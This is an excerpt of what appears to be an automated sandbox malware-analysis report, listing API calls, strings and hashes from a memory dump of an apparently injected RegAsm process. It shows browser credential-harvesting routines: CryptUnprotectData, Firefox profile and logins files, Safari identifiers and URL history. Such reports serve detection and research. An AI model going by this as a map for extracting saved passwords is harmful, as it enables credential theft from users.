                                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                APIs
                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                Strings
                                                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 829165378-0
                                                                                                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleIconLoadModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                • String ID: logins$null
                                                                                                                                                                                • API String ID: 2148543256-2163367763
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
